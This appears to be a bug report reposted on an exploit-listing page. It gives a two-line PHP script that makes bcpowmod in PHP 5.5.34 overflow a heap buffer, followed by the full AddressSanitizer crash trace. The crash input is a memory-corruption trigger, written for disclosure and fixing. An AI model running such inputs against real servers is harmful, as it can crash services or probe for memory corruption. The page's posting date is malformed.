Home / exploits PHP 5.5.34 bcpowmod accepts negative scale and corrupts _one_ definition
Posted on 30 November -0001
<HTML><HEAD><TITLE>PHP 5.5.34 bcpowmod accepts negative scale and corrupts _one_ definition</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>Description: ------------ Run with ASAN Test script: --------------- <?php bcpowmod(1, "A", 128, -200); bcpowmod(1, 1.2, 1, 1); Expected result: ---------------- No crash Actual result: -------------- bc math warning: non-zero scale in exponent ================================================================= ==15893==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb3805f68 at pc 0x083fd271 bp 0xbf91e4d8 sp 0xbf91e4c8 READ of size 1 at 0xb3805f68 thread T0 #0 0x83fd270 in bc_divide /home/fmunozs/phpgit/php56/ext/bcmath/libbcmath/src/div.c:122 #1 0x83fff96 in bc_raisemod /home/fmunozs/phpgit/php56/ext/bcmath/libbcmath/src/raisemod.c:69 #2 0x83f9923 in zif_bcpowmod /home/fmunozs/phpgit/php56/ext/bcmath/bcmath.c:426 #3 0x9a7c718 in zend_do_fcall_common_helper_SPEC /home/fmunozs/phpgit/php56/Zend/zend_vm_execute.h:558 #4 0x9640316 in execute_ex /home/fmunozs/phpgit/php56/Zend/zend_vm_execute.h:363 #5 0x9a6c9c8 in zend_execute /home/fmunozs/phpgit/php56/Zend/zend_vm_execute.h:388 #6 0x9470b59 in zend_execute_scripts /home/fmunozs/phpgit/php56/Zend/zend.c:1341 #7 0x91acc6b in php_execute_script /home/fmunozs/phpgit/php56/main/main.c:2613 #8 0x9a8648a in do_cli /home/fmunozs/phpgit/php56/sapi/cli/php_cli.c:994 #9 0x808a502 in main /home/fmunozs/phpgit/php56/sapi/cli/php_cli.c:1378 #10 0xb6dbe645 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18645) #11 0x808aaba (/home/fmunozs/phpgit/php56/sapi/cli/php+0x808aaba) 0xb3805f68 is located 8 bytes to the left of 8-byte region [0xb3805f70,0xb3805f78) freed by thread T0 here: #0 0xb726f9f4 in free (/usr/lib/i386-linux-gnu/libasan.so.2+0x969f4) #1 0xb334c911 (/usr/lib/i386-linux-gnu/libtasn1.so.6+0xa911) previously allocated by thread T0 here: #0 0xb726fd06 in malloc (/usr/lib/i386-linux-gnu/libasan.so.2+0x96d06) #1 0xb334c17e (/usr/lib/i386-linux-gnu/libtasn1.so.6+0xa17e) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/fmunozs/phpgit/php56/ext/bcmath/libbcmath/src/div.c:122 bc_divide Shadow bytes around the buggy address: 0x36700b90: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa 0x36700ba0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa 0x36700bb0: fa fa fd fa fa fa 00 00 fa fa fd fa fa fa fd fa 0x36700bc0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa 0x36700bd0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa =>0x36700be0: fa fa fd fa fa fa fd fa fa fa fd fa fa[fa]fd fa 0x36700bf0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa 0x36700c00: fa fa 01 fa fa fa 01 fa fa fa 01 fa fa fa 00 06 0x36700c10: fa fa 00 03 fa fa 00 05 fa fa 00 06 fa fa 00 07 0x36700c20: fa fa 00 00 fa fa 00 07 fa fa 00 00 fa fa 00 05 0x36700c30: fa fa 00 07 fa fa 00 07 fa fa 00 00 fa fa 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==15893==ABORTING</BODY></HTML>